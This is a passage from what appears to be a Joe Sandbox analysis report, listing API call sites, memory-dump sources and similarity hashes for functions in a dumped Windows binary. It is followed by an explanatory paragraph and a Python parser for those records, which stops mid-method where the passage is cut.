                                                                                          • Opcode Fuzzy Hash: 9ca52e2f36e6298e0da0b73f4c48285a799823b45280523adb4bff91af1efe56
                                                                                          • Instruction Fuzzy Hash: 01216232D0E783A7E7905B64A588238AAA0FF4A765F144235E95ED27E1CF7CE448A700
                                                                                          APIs
                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF6A0E83584
                                                                                          • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E8359C
                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E835C3
                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E835D9
                                                                                          • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E835ED
                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E83602
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                                                          • String ID:
                                                                                          • API String ID: 513048808-0
                                                                                          • Opcode ID: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
                                                                                          • Instruction ID: 9360532829a1180bc1ba1bfd298e21d861a24efe4ffdd5f5c546e1659e996bc3
                                                                                          • Opcode Fuzzy Hash: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
                                                                                          • Instruction Fuzzy Hash: 7F118231A0AA83B6EA508B74A544078AAA0FF4A776F155334EA2F837D0DF3CD449B700
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                          • String ID:
                                                                                          • API String ID: 4104442557-0
                                                                                          • Opcode ID: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
                                                                                          • Instruction ID: da337f146694d40f7d7b5ee8f168c45d44a5ef4284a76db0b27135cd516d3f6c
                                                                                          • Opcode Fuzzy Hash: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
                                                                                          • Instruction Fuzzy Hash: F1115132A06B429BEB00DF70E8441A933B4FB5D759F500A30EA6D87B54EF7CD5A49340
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: wcschr$Heapiswspacememset$AllocProcess
                                                                                          • String ID: %s
                                                                                          • API String ID: 2401724867-3043279178
                                                                                          • Opcode ID: 740c75b15b64cf7ac9eb9688b57878eb6de44e609a22920e9cf606d70b52c251
                                                                                          • Instruction ID: aa66959b98c0e2ab925dcff1ec252c9b985aa4f6ee021086a056ce9cad47ed80
                                                                                          • Opcode Fuzzy Hash: 740c75b15b64cf7ac9eb9688b57878eb6de44e609a22920e9cf606d70b52c251
                                                                                          • Instruction Fuzzy Hash: 9151BB72B0A683AAEB208F25D8402B977A0FF49B94F444035DE5D87795EF3CE545E700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentDirectorytowupper
                                                                                          • String ID: :$:
                                                                                          • API String ID: 238703822-3780739392
                                                                                          • Opcode ID: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
                                                                                          • Instruction ID: 9d9a1b67c2931cd473b2193f9dffb7614a01e9b4999d71b81f983902e503c8a5
                                                                                          • Opcode Fuzzy Hash: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
                                                                                          • Instruction Fuzzy Hash: 0C11277260A742A5EB258B71E805279F6E0FF4D79AF458132EE0D87790DF3CD145A704
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 00007FF6A0E7921C
                                                                                          • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF6A0E793AA
                                                                                            • Part of subcall function 00007FF6A0E78B20: wcsrchr.MSVCRT ref: 00007FF6A0E78BAB
                                                                                            • Part of subcall function 00007FF6A0E78B20: _wcsicmp.MSVCRT ref: 00007FF6A0E78BD4
                                                                                            • Part of subcall function 00007FF6A0E78B20: _wcsicmp.MSVCRT ref: 00007FF6A0E78BF2
                                                                                            • Part of subcall function 00007FF6A0E78B20: GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6A0E78C16
                                                                                            • Part of subcall function 00007FF6A0E78B20: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6A0E78C2F
                                                                                            • Part of subcall function 00007FF6A0E78B20: wcschr.MSVCRT ref: 00007FF6A0E78CB3
                                                                                            • Part of subcall function 00007FF6A0E8417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF6A0E841AD
                                                                                            • Part of subcall function 00007FF6A0E83060: SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF6A0E792AC), ref: 00007FF6A0E830CA
                                                                                            • Part of subcall function 00007FF6A0E83060: SetErrorMode.KERNELBASE ref: 00007FF6A0E830DD
                                                                                            • Part of subcall function 00007FF6A0E83060: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6A0E830F6
                                                                                            • Part of subcall function 00007FF6A0E83060: SetErrorMode.KERNELBASE ref: 00007FF6A0E83106
                                                                                          • wcsrchr.MSVCRT ref: 00007FF6A0E792D8
                                                                                          • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6A0E79362
                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6A0E79373
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Error$Mode$AttributesFileLast_wcsicmpmemsetwcsrchr$CurrentDirectoryFullNamePathwcschr
                                                                                          • String ID:
                                                                                          • API String ID: 3966000956-0
                                                                                          • Opcode ID: 183dd49cd64c4b512f254b2111cbb7598a172917c7dc1c37f5ad0fa1295e0e26
                                                                                          • Instruction ID: ccd7cafef9c02098fd72ad3f03de88393f2d586589c48a52a10c5fc60daa8822
                                                                                          • Opcode Fuzzy Hash: 183dd49cd64c4b512f254b2111cbb7598a172917c7dc1c37f5ad0fa1295e0e26
                                                                                          • Instruction Fuzzy Hash: 7151A132A0B783AAEB619F21D8502B973A4FF49B94F144035DA4D87B96DF3CE555E300
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                           • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$_setjmp
                                                                                          • String ID:
                                                                                          • API String ID: 3883041866-0
                                                                                          • Opcode ID: ecc4c4b8fdff3fe7128d071ff51470f6781c2868d41e5204ec9995c2413b862b
                                                                                          • Instruction ID: 0d8a7926be7279bdd5d7f1818692bd8a66d0eab3a288a87ff977f10a7a513f45
                                                                                          • Opcode Fuzzy Hash: ecc4c4b8fdff3fe7128d071ff51470f6781c2868d41e5204ec9995c2413b862b
                                                                                          • Instruction Fuzzy Hash: 04516D32A0AB869AEB61CF21D8403E977A4FB49748F444139EA4D8BB49DF3CD645DB00
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                           • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorModememset$FullNamePath_wcsicmp
                                                                                          • String ID:
                                                                                          • API String ID: 2123716050-0
                                                                                          • Opcode ID: bbaf5dedd0cbdd4485c46577773df657aecb1a5bcd9d4c4f0a46f38ce4e38573
                                                                                          • Instruction ID: 3b92ce1e7ea0f2dc4bc367535446947fa65de45b2aeed9ec81226022f30a6b59
                                                                                          • Opcode Fuzzy Hash: bbaf5dedd0cbdd4485c46577773df657aecb1a5bcd9d4c4f0a46f38ce4e38573
                                                                                          • Instruction Fuzzy Hash: 7B41903270ABC29AEB718F25D8503E967A4FB49B8DF044134DB4D8AB99DF3CD2499700
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                           • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Console$Window_get_osfhandle$InitializeModeUninitializememset
                                                                                          • String ID:
                                                                                          • API String ID: 3114114779-0
                                                                                          • Opcode ID: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
                                                                                          • Instruction ID: 4863d05a9c0cb4b22135a9edc6520b25f37b698ba00d273919510669793c5822
                                                                                          • Opcode Fuzzy Hash: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
                                                                                          • Instruction Fuzzy Hash: C4411632A0AB42AAE7008F65E8802AD77A5FB88748F554136EA0D93B55DF38E416D740
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                           • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: wcschr$Heapiswspace$AllocProcess
                                                                                          • String ID: %s=%s$DPATH$PATH
                                                                                          • API String ID: 3731854180-3148396303
                                                                                          • Opcode ID: ed2b41c8f7c1b35c8c8099a63381124b221818ea20370dab215de2e112638c1b
                                                                                          • Instruction ID: b4100da367efd42e06ae6e9ca4db64a264bb8194cd8f2287079e6eeec79ab058
                                                                                          • Opcode Fuzzy Hash: ed2b41c8f7c1b35c8c8099a63381124b221818ea20370dab215de2e112638c1b
                                                                                          • Instruction Fuzzy Hash: 61218B72B0B643A2EA54DF5AE4402B9A7B0BF88BC0F984135DD0EC7795DF2CE844A350
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                           • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: wcscmp
                                                                                          • String ID: *.*$????????.???
                                                                                          • API String ID: 3392835482-3870530610
                                                                                          • Opcode ID: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
                                                                                          • Instruction ID: 0b7f62fc094bc8f30599c39fc0166625dd04408525ce4c0cc3b621069cf24260
                                                                                          • Opcode Fuzzy Hash: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
                                                                                          • Instruction Fuzzy Hash: 5611A135B25AA391E7688F26B54053973A1FB88B80F1D5031DE8D97B99DF3DE481A700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                           • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: iswspacewcschr
                                                                                          • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$=,;
                                                                                          • API String ID: 287713880-1183017076
                                                                                          • Opcode ID: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
                                                                                          • Instruction ID: 2696317d1d78fe5c4ff2287c67e83b8cc7db43652a81909c36ae0990c28fce1e
                                                                                          • Opcode Fuzzy Hash: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
                                                                                          • Instruction Fuzzy Hash: F0F06231A1E753E5FAA88B51F44017A66A0FF49F41F5A9171E95E83354EF3CE448E700
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF6A0E81EA0: wcschr.MSVCRT(?,?,?,00007FF6A0E7286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF6A0EA0D54), ref: 00007FF6A0E81EB3
                                                                                          • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6A0E75A2E
                                                                                          • _open_osfhandle.MSVCRT ref: 00007FF6A0E75A4F
                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00008000,?,00000001,00007FF6A0E7260D), ref: 00007FF6A0E937AA
                                                                                          • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF6A0E937D2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                           • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseCreateErrorFileHandleLast_open_osfhandlewcschr
                                                                                          • String ID:
                                                                                          • API String ID: 22757656-0
                                                                                          • Opcode ID: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
                                                                                          • Instruction ID: e84dd46319411e3f8c536e4a56e9bab855937b585c6485bd26942bce53296f20
                                                                                          • Opcode Fuzzy Hash: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
                                                                                          • Instruction Fuzzy Hash: FF119472A1564697E7108B24E44833DBAA0FB89B75F644734E62E873D5CF3CD4499B00
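The records in this listing are Joe Sandbox's per-function fingerprints for the image dumped at 00007FF6A0E70000 in process 6: the API call sites with their virtual addresses, the memory regions the function was recovered from, and the Opcode/Instruction IDs that let one function be matched against other reports. Pivoting on them (rebasing a call-site address into the dumped PE for IDA or Ghidra, comparing Opcode IDs across samples, or listing which APIs a function calls itself rather than through a callee) is easier with the record as structured data. The parser below is an added example written for this page, not Joe Sandbox code. Its input is one record copied from the listing above, and it keys on the layout as rendered here (the "APIs", "Memory Dump Source", "Joe Sandbox IDA Plugin" and "Similarity" headings with "•" items). It assumes only that the first dotted field of an .sdmp name is the process index and the fourth is the region address, which is what the report's own "Offset" values and the `hcaresult_6_2_...` snapshot name line up with; the remaining fields are kept raw rather than interpreted.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed input: one function record in the layout used on this page. The
# values are copied from the report; only the framing as a string is ours.
SAMPLE_RECORD = """\
APIs
  • Part of subcall function 00007FF6A0E81EA0: wcschr.MSVCRT(?,?,?,00007FF6A0E7286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF6A0EA0D54), ref: 00007FF6A0E81EB3
• CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6A0E75A2E
• _open_osfhandle.MSVCRT ref: 00007FF6A0E75A4F
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00008000,?,00000001,00007FF6A0E7260D), ref: 00007FF6A0E937AA
• CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF6A0E937D2
Memory Dump Source
• Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
• Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
Similarity
• API ID: CloseCreateErrorFileHandleLast_open_osfhandlewcschr
• String ID:
• API String ID: 22757656-0
• Opcode ID: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
• Instruction ID: e84dd46319411e3f8c536e4a56e9bab855937b585c6485bd26942bce53296f20
• Opcode Fuzzy Hash: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
• Instruction Fuzzy Hash: FF119472A1564697E7108B24E44833DBAA0FB89B75F644734E62E873D5CF3CD4499B00
"""

# "<fn>.<module>[(args)][,] ref: <va>", optionally prefixed by the subcall marker.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<fn>\w+)\.(?P<mod>[\w-]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$"
)
# Eight dotted fields followed by "sdmp"; only fields 0 and 3 are interpreted (assumption, see above).
DUMP_RE = re.compile(r"(?P<name>(?:[0-9A-Fa-f]+\.){8}sdmp)")
OFFSET_RE = re.compile(r"Offset: (?P<base>[0-9A-Fa-f]+)")
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}


@dataclass
class ApiRef:
    function: str
    module: str
    ref: int                    # virtual address of the call site in the dumped image
    subcall_of: Optional[int]   # set when the report attributes the call to a callee function
    args: Optional[str]


@dataclass
class FunctionRecord:
    apis: List[ApiRef] = field(default_factory=list)
    source_dump: str = ""
    base: int = 0
    process_index: int = -1
    associated: List[str] = field(default_factory=list)
    snapshot: str = ""
    similarity: Dict[str, str] = field(default_factory=dict)

    def rva(self, va: int) -> int:
        """Offset of a call site from the module base; what you jump to after rebasing the dump."""
        return va - self.base

    def direct_apis(self) -> List[str]:
        """APIs called from this function itself, in listing order (subcall entries excluded)."""
        return [a.function for a in self.apis if a.subcall_of is None]

    def hashes_consistent(self) -> bool:
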